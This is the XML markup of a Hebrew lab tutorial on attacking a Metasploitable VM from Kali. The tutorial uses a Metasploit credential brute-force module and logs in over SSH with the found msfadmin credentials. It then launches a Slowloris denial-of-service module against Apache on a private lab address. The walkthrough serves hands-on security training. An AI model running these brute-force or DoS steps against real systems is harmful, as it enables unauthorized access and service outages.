        </w:rPr>
        <w:t xml:space="preserve">כתובת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של המחשב הנתקף</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOSTS - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7553A7BE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255717CA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9386C4A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03C6A8F8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74CE0FF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כעת יש לנו עוד שני אפשרויות שאנחנו יכולים לשנות אבל לא חייבים</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B608B99" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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</w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ניסיון התאמת סיסמא לכל המשתמשים </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> USER_AS_PASS –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D85B41" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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05CE8F1D" wp14:editId="60550FF1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6799478" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone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478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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הצגת פלט ניסיונות התאמה בין שם משתמש לסיסמא</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VERBOSE - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04318AF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BAC9146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264E141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D5F6EC2" w14:textId="77777777" w:rsidR="00F654FA" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00F654FA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ולבסוף נריץ את הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B2783" w14:textId="3D75DB00" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00F654FA" w:rsidP="00F654FA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92384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A518A89" wp14:editId="477408C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646545" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone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7B15E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5BE85C7C" wp14:editId="5EBBFFCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>184785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7511899" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone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899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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>עכשיו הפקודה מתחיל לעבור על קובץ המשתמשים והסיסמאות כדי לחפש התאמה</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442C48C0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1EFD346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889295B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1044486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BC5B8EB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A34FA2" wp14:editId="2C330273">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>548640</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19050</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="678180" cy="335280"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="73" name="מלבן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A28B7" id="מלבן 73" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:43.2pt;margin-top:1.5pt;width:53.4pt;height:26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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B541351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37605B0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31C4DCC6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וכמו שאפשר לראות יש לנו התאמה בין שם המשתמש לסיסמא  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856555E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lastRenderedPageBreak/>
        <w:t>שם משתמש:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E8CFE" w14:textId="5820C815" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00CE457A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סיסמא: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mfsadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08239F9A" w14:textId="6462BB66" w:rsidR="006E68E4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אז יש לנו את השם משתמש והסיסמא בואו ננסה להתחבר דרך ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metaspoloitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56B30C" w14:textId="2E202FEC" w:rsidR="009F468F" w:rsidRDefault="009F468F" w:rsidP="006E68E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פקודה שאריץ ב</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB3838" w14:textId="52DB9A49" w:rsidR="009F468F" w:rsidRPr="009F468F" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F468F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh msfadmin@192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3DE17F" w14:textId="7583B0D8" w:rsidR="009F468F" w:rsidRDefault="009F468F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95456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BF1AE59" wp14:editId="3DA5FB9F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1662430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>11430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5029200" cy="3368040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone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56CBC" w14:textId="7A09FBEC" w:rsidR="009F468F" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AE9AAE" w14:textId="59BE5304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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70E6D8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854B9F1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56E4BB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535B5404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1B3018E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B4F9832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378EC0DB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A8973C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C469711" w14:textId="582439FD" w:rsidR="00F654FA" w:rsidRDefault="00F654FA" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D191EE" w14:textId="77777777" w:rsidR="009F468F" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B2E5F5" w14:textId="06CCECAC" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E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D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
      </w:r>
      <w:r w:rsidR="0002686C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CB79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מודול זה מתמקד בהתקפת</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> על שרת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> מסוג </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שכבר מותקן ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8B7EDC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ההתקפה שנבצע היא התקפת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (מניעת שירות) על שרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E8C72" w14:textId="262A1850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תחילה ניגש לשרת ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונוודא שהוא פעיל </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AED90B" w14:textId="37F37C9F" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F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BA8E7A" wp14:editId="5BB6CDA6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1977390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>109855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1268730" cy="369570"/>
                <wp:effectExtent l="19050" t="19050" r="45720" b="30480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3695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50667" id="מלבן 18" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:155.7pt;margin-top:8.65pt;width:99.9pt;height:29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" filled="f" strokecolor="#70ad47 [3209]" strokeweight="4.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006E68E4"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 wp14:anchorId="6F11D8DA" wp14:editId="21D08FE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026374" cy="3092450"/>
            <wp:effectExtent l="0" t="0" r="0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374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93691" w14:textId="11CE82A0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E3F1BA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06150B13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05681EF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1C3AA3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0A657AD0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22542F2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A861F66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266F4BAC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6B6C121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C1BD8F0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535E7A1B" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>הערה: חשוב לשים לב להיכנס ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ולא ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7F2EA7" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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2C2DBC7F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כעת נעבור ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וניגש ל </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A52954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  <w:rtl/>
        </w:rPr>
        <w:t>ונבצע חיפוש עם הפקודה</w:t>
      </w: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slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F6982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98528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C396A3F" wp14:editId="51ADCD40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6385560" cy="1417320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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F92F0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6AE504E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6EFA4512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1238A912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22BACFD0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73C321D8" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251799552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13A7EC57" wp14:editId="2C228226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5412740" cy="620873"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255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62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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">ונעתיק את המודול לשורת הפקודה : </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use auxiliary/dos/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>slowloris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FF66005" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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49CE5FBB" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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50D387E8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5E11B43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עכשיו נפתח את הגדרות המודול ונראה איזה נתונים צריך למלא</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B48CB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00576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42E7BCA7" wp14:editId="4F3D2C2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309360" cy="1670858"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:wrapNone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67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47108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39511F37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8275C9D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918F8DC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E0FD348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029564F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כאן נצטרך למלא את כתובת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הנתקפת במקרה הזה 192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE0F6ED" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251801600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78D2E98B" wp14:editId="4E56677E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>666750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>288925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5977890" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:wrapNone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50" cy="4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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נשתמש בפקודה  </w:t>
      </w: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rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.156</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6DE765" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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5C52ECED" w14:textId="77777777" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4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745814C4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ואחר כך נריץ את המתקפה עם הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722186C8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ונראה שהמתקפה מתחיל לפעול.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C8FEF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63CD1920" wp14:editId="4E49BDFC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4869180" cy="2133813"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
